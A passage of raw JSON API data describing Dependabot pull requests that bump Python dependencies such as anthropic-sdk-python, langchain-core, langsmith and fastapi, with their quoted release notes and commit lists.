Publishing for PyPI releases (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/1d04fc52d2dd1f88e22808de2c53b0d66913631f\"\u003e1d04fc5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/blob/main/CHANGELOG.md\"\u003eanthropic's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.107.0 (2026-06-06)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.106.0...v0.107.0\"\u003ev0.106.0...v0.107.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e small updates to Managed Agents types (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/72923f986f808597f86482a7eae4fba9a791e6ae\"\u003e72923f9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.106.0 (2026-06-05)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.2...v0.106.0\"\u003ev0.105.2...v0.106.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e mark Claude Opus 4.1 as deprecated (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/85068cc4cb42feecb80a378942cec71e1baa8dcf\"\u003e85068cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eclient:\u003c/strong\u003e make Foundry client copy() and with_options() work (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/94146acdc1c6f66f187d5a42e4afbb911e692fe8\"\u003e94146ac\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etransform schema:\u003c/strong\u003e preserve $defs when schema root is a $ref (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1642\"\u003e#1642\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/fc58e06b78407b447c50dfea109c6fb300f4b97d\"\u003efc58e06\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix artifact url (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a6ed0c4124d29989a568a27293dadf66e7ebcd6f\"\u003ea6ed0c4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix branch names (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3b0337074f0bbab47bf7f5a2b76b4d240cff719a\"\u003e3b03370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e update private repo name (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/7dbcb05706f1865afeee62fb06e400f5c4bf619e\"\u003e7dbcb05\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epoint security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/80f2c97b8e9534f9879945de11c11aba00cf8704\"\u003e80f2c97\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.105.2 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.1...v0.105.2\"\u003ev0.105.1...v0.105.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.105.1 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.0...v0.105.1\"\u003ev0.105.0...v0.105.1\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e use Trusted Publishing for PyPI releases (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/1d04fc52d2dd1f88e22808de2c53b0d66913631f\"\u003e1d04fc5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.105.0 (2026-05-28)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.104.1...v0.105.0\"\u003ev0.104.1...v0.105.0\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/4ceca722bedbd923671365f1a36f86d09fbec657\"\u003e\u003ccode\u003e4ceca72\u003c/code\u003e\u003c/a\u003e release: 0.107.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3a6f9d9c217bdb504ddd229618149ab7e8033ad3\"\u003e\u003ccode\u003e3a6f9d9\u003c/code\u003e\u003c/a\u003e feat(api): small updates to Managed Agents types\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/6a70c9f72b16b04348564c5b92961a82ebe4b7da\"\u003e\u003ccode\u003e6a70c9f\u003c/code\u003e\u003c/a\u003e release: 0.106.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/8fa41c8acf6885fd8b7a0a67f705bbb9d3058672\"\u003e\u003ccode\u003e8fa41c8\u003c/code\u003e\u003c/a\u003e codegen metadata\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/1f553254640b45aecef37df0000da68dc2bcb9c5\"\u003e\u003ccode\u003e1f55325\u003c/code\u003e\u003c/a\u003e Don't leak ANTHROPIC_API_KEY to the Foundry endpoint (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/18\"\u003e#18\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a94498c6aa3dd4e237ed72dacdd26336bbd7d9fc\"\u003e\u003ccode\u003ea94498c\u003c/code\u003e\u003c/a\u003e fix(client): make Foundry client copy() and with_options() work\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/907d849f8dfec50dfeda06b5cdde0ee268f9b7f9\"\u003e\u003ccode\u003e907d849\u003c/code\u003e\u003c/a\u003e chore(internal): fix artifact url\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/9676a5d0d40162a385001f60aa136f97b2718309\"\u003e\u003ccode\u003e9676a5d\u003c/code\u003e\u003c/a\u003e docs: point security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/80c95b8cc47e2e0600be68dda707b3a7231929c8\"\u003e\u003ccode\u003e80c95b8\u003c/code\u003e\u003c/a\u003e chore(internal): fix branch names\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/e5584f948a8692b0fb205248324eb89f269b9b5a\"\u003e\u003ccode\u003ee5584f9\u003c/code\u003e\u003c/a\u003e chore(internal): update private repo name\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.96.0...v0.107.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langchain-core` from 1.4.0 to 1.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langchain/releases\"\u003elangchain-core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elangchain-core==1.4.1\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-core==1.4.0\u003c/p\u003e\n\u003cp\u003erelease(core): 1.4.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37922\"\u003e#37922\u003c/a\u003e)\nfix(core): remove Bedrock prevalidation from \u003ccode\u003eload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37909\"\u003e#37909\u003c/a\u003e)\ndocs(core): expand and link \u003ccode\u003eModelProfile\u003c/code\u003e docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37904\"\u003e#37904\u003c/a\u003e)\nrelease(anthropic): 1.4.4 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37757\"\u003e#37757\u003c/a\u003e)\nchore(core): bump \u003ccode\u003euuid-utils\u003c/code\u003e to 0.16.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37699\"\u003e#37699\u003c/a\u003e)\nchore(infra): bump \u003ccode\u003elangchain-tests\u003c/code\u003e floor to 1.1.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37610\"\u003e#37610\u003c/a\u003e)\nrelease(standard-tests): 1.1.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37609\"\u003e#37609\u003c/a\u003e)\nchore: bump idna from 3.11 to 3.15 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37539\"\u003e#37539\u003c/a\u003e)\nci(infra): harden Dependabot version-bound preservation (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37510\"\u003e#37510\u003c/a\u003e)\nhotfix: bump lockfiles (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37508\"\u003e#37508\u003c/a\u003e)\ndocs(core): note override for \u003ccode\u003e_get_ls_params\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37503\"\u003e#37503\u003c/a\u003e)\nchore(core,langchain,openai): refresh stale OpenAI model references (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37487\"\u003e#37487\u003c/a\u003e)\nchore: bump langsmith from 0.7.31 to 0.8.0 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37395\"\u003e#37395\u003c/a\u003e)\nfix(core): accept \u003ccode\u003eSerializable\u003c/code\u003e constructor-envelope wire shape in \u003ccode\u003e_convert_to_message\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37456\"\u003e#37456\u003c/a\u003e)\nfix(core): preserve chunk \u003ccode\u003eadditional_kwargs\u003c/code\u003e across v3 stream assembly (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37435\"\u003e#37435\u003c/a\u003e)\nfix(core): preserve reasoning blocks alongside tool_call in v3 stream (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37434\"\u003e#37434\u003c/a\u003e)\nchore: bump jupyter-server from 2.17.0 to 2.18.0 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37354\"\u003e#37354\u003c/a\u003e)\nchore: bump mistune from 3.1.4 to 3.2.1 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37353\"\u003e#37353\u003c/a\u003e)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/a401351e12b9a3e1670314adf2f7bbcf8811903c\"\u003e\u003ccode\u003ea401351\u003c/code\u003e\u003c/a\u003e release(core): 1.4.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37922\"\u003e#37922\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/053c368ba438ca077f1348147fadc5dad16d6898\"\u003e\u003ccode\u003e053c368\u003c/code\u003e\u003c/a\u003e fix(core): remove Bedrock prevalidation from \u003ccode\u003eload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37909\"\u003e#37909\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/0993edba86014788827144c175499755ec5b9f55\"\u003e\u003ccode\u003e0993edb\u003c/code\u003e\u003c/a\u003e chore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37916\"\u003e#37916\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/6f7c8f54454ae45b07ca274cbfbb0afb8cef9041\"\u003e\u003ccode\u003e6f7c8f5\u003c/code\u003e\u003c/a\u003e chore: bump starlette from 0.49.1 to 1.0.1 in /libs/langchain (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37899\"\u003e#37899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/586bcd46a17be1eafc61127460d766b2a0611db3\"\u003e\u003ccode\u003e586bcd4\u003c/code\u003e\u003c/a\u003e docs(core): expand and link \u003ccode\u003eModelProfile\u003c/code\u003e docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37904\"\u003e#37904\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/9eab5237ccf7878648b2d33108a7f7e15331c452\"\u003e\u003ccode\u003e9eab523\u003c/code\u003e\u003c/a\u003e chore: bump requests from 2.34.0 to 2.34.2 in /libs/partners/xai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37903\"\u003e#37903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/be2e8f70bc472354f23e9f62519427dd2de7d332\"\u003e\u003ccode\u003ebe2e8f7\u003c/code\u003e\u003c/a\u003e ci(infra): add \u003ccode\u003eexclude\u003c/code\u003e input to skip libs in scheduled integration tests (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/3b999176c84c1236e1f6fbaa5194782360e82264\"\u003e\u003ccode\u003e3b99917\u003c/code\u003e\u003c/a\u003e test(langchain,partners): disable pytest-benchmark under xdist to silence `Py...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/34af59c1a69c403d7b34d0bbd9ceffd287e3b0ed\"\u003e\u003ccode\u003e34af59c\u003c/code\u003e\u003c/a\u003e fix(partners): cap aiohttp below 3.14 for vcrpy compat (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37898\"\u003e#37898\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/414d7b8e94fca5102e87a1f7a6c70e32622a85b9\"\u003e\u003ccode\u003e414d7b8\u003c/code\u003e\u003c/a\u003e chore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37895\"\u003e#37895\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langchain/compare/langchain-core==1.4.0...langchain-core==1.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langsmith` from 0.8.4 to 0.8.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/releases\"\u003elangsmith's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.8.9\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat(sandbox): add JS Dockerfile snapshots by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2951\"\u003elangchain-ai/langsmith-sdk#2951\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump the js-minor-and-patch group across 1 directory with 11 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2931\"\u003elangchain-ai/langsmith-sdk#2931\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump websockets from 15.0.1 to 16.0 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2811\"\u003elangchain-ai/langsmith-sdk#2811\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): update myst-parser requirement from \u0026gt;=3 to \u0026gt;=4.0.1 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2841\"\u003elangchain-ai/langsmith-sdk#2841\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump the py-minor-and-patch group across 1 directory with 19 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2934\"\u003elangchain-ai/langsmith-sdk#2934\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump typescript from 5.9.3 to 6.0.3 in /js by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2839\"\u003elangchain-ai/langsmith-sdk#2839\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump google-adk from 1.10.0 to 2.1.0 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2960\"\u003elangchain-ai/langsmith-sdk#2960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump wrapt from 1.17.3 to 2.2.1 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2961\"\u003elangchain-ai/langsmith-sdk#2961\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump the py-minor-and-patch group in /python with 6 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2958\"\u003elangchain-ai/langsmith-sdk#2958\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump types-tqdm from 4.67.3.20260408 to 4.67.3.20260518 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2959\"\u003elangchain-ai/langsmith-sdk#2959\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add minimum workflow permissions by \u003ca href=\"https://github.com/jkennedyvz\"\u003e\u003ccode\u003e@​jkennedyvz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2967\"\u003elangchain-ai/langsmith-sdk#2967\u003c...\n\n_Description has been truncated_","html_url":"https://github.com/anulum/director-ai/pull/77","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/anulum%2Fdirector-ai/issues/77","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/77/packages"},{"uuid":"4593508745","node_id":"PR_kwDORyXkV87i7KSg","number":9,"state":"closed","title":"Bump the python-dependencies group across 1 directory with 21 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-06-12T01:58:12.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-05T01:56:24.000Z","updated_at":"2026-06-12T01:58:14.000Z","time_to_close":604908,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"python-dependencies","update_count":21,"packages":[{"name":"fastapi","old_version":"0.135.1","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"redis","old_version":"7.3.0","new_version":"8.0.0","repository_url":"https://github.com/redis/redis-py"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"pre-commit","old_version":"4.5.1","new_version":"4.6.0","repository_url":"https://github.com/pre-commit/pre-commit"},{"name":"boto3","old_version":"1.42.68","new_version":"1.43.23","repository_url":"https://github.com/boto/boto3"},{"name":"celery","old_version":"5.6.2","new_version":"5.6.3","repository_url":"https://github.com/celery/celery"},{"name":"authlib","old_version":"1.6.9","new_version":"1.7.2","repository_url":"https://github.com/authlib/authlib"},{"name":"pydantic-settings","old_version":"2.13.1","new_version":"2.14.1","repository_url":"https://github.com/pydantic/pydantic-settings"},{"name":"uvicorn","old_version":"0.42.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"prometheus-fastapi-instrumentator","old_version":"7.1.0","new_version":"8.0.0","repository_url":"https://github.com/trallnag/prometheus-fastapi-instrumentator"},{"name":"python-json-logger","old_version":"4.0.0","new_version":"4.1.0","repository_url":"https://github.com/nhairs/python-json-logger"},{"name":"sentry-sdk","old_version":"2.54.0","new_version":"2.61.1","repository_url":"https://github.com/getsentry/sentry-python"},{"name":"flagsmith","old_version":"5.1.1","new_version":"5.4.0"},{"name":"werkzeug","old_version":"3.1.6","new_version":"3.1.8","repository_url":"https://github.com/pallets/werkzeug"},{"name":"pyroscope-io","old_version":"1.0.4","new_version":"1.0.11"},{"name":"mypy","old_version":"1.19.1","new_version":"2.1.0","repository_url":"https://github.com/python/mypy"},{"name":"ruff","old_version":"0.15.6","new_version":"0.15.16","repository_url":"https://github.com/astral-sh/ruff"},{"name":"pytest","old_version":"9.0.2","new_version":"9.0.3","repository_url":"https://github.com/pytest-dev/pytest"},{"name":"pytest-asyncio","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/pytest-dev/pytest-asyncio"},{"name":"pytest-cov","old_version":"7.0.0","new_version":"7.1.0","repository_url":"https://github.com/pytest-dev/pytest-cov"},{"name":"httpx-ws","old_version":"0.8.2","new_version":"0.9.0","repository_url":"https://github.com/frankie567/httpx-ws"}],"path":null,"ecosystem":"pip"},"body":"Bumps the python-dependencies group with 21 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.135.1` | `0.136.3` |\n| [redis](https://github.com/redis/redis-py) | `7.3.0` | `8.0.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [pre-commit](https://github.com/pre-commit/pre-commit) | `4.5.1` | `4.6.0` |\n| [boto3](https://github.com/boto/boto3) | `1.42.68` | `1.43.23` |\n| [celery](https://github.com/celery/celery) | `5.6.2` | `5.6.3` |\n| [authlib](https://github.com/authlib/authlib) | `1.6.9` | `1.7.2` |\n| [pydantic-settings](https://github.com/pydantic/pydantic-settings) | `2.13.1` | `2.14.1` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.42.0` | `0.49.0` |\n| [prometheus-fastapi-instrumentator](https://github.com/trallnag/prometheus-fastapi-instrumentator) | `7.1.0` | `8.0.0` |\n| [python-json-logger](https://github.com/nhairs/python-json-logger) | `4.0.0` | `4.1.0` |\n| [sentry-sdk](https://github.com/getsentry/sentry-python) | `2.54.0` | `2.61.1` |\n| flagsmith | `5.1.1` | `5.4.0` |\n| [werkzeug](https://github.com/pallets/werkzeug) | `3.1.6` | `3.1.8` |\n| pyroscope-io | `1.0.4` | `1.0.11` |\n| [mypy](https://github.com/python/mypy) | `1.19.1` | `2.1.0` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.6` | `0.15.16` |\n| [pytest](https://github.com/pytest-dev/pytest) | `9.0.2` | `9.0.3` |\n| [pytest-asyncio](https://github.com/pytest-dev/pytest-asyncio) | `1.3.0` | `1.4.0` |\n| [pytest-cov](https://github.com/pytest-dev/pytest-cov) | `7.0.0` | `7.1.0` |\n| [httpx-ws](https://github.com/frankie567/httpx-ws) | `0.8.2` | `0.9.0` |\n\n\nUpdates `fastapi` from 0.135.1 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca 